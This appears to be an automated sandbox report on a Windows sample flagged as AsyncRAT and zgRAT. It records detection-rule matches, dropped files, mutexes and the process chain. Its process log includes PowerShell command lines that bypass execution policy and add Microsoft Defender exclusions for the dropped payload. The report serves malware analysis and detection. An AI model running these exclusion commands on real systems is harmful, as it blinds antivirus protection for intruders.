Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\btjxg.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 9NBx4Vmiuj.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TypeId.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@16/21@3/3

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

File created: C:\Users\user\AppData\Roaming\AuditRuleType

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\66369895937b82c448aed43e9a0f200e
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Mutant created: \Sessions\1\BaseNamedObjects\i0Yq2Adr82znjD2G

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Temp\btjxg.exe

Jump to behavior

Source: 9NBx4Vmiuj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9NBx4Vmiuj.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9NBx4Vmiuj.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

File read: C:\Users\user\Desktop\9NBx4Vmiuj.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9NBx4Vmiuj.exe "C:\Users\user\Desktop\9NBx4Vmiuj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'	Jump to behavior

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9NBx4Vmiuj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9NBx4Vmiuj.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 9NBx4Vmiuj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 9NBx4Vmiuj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
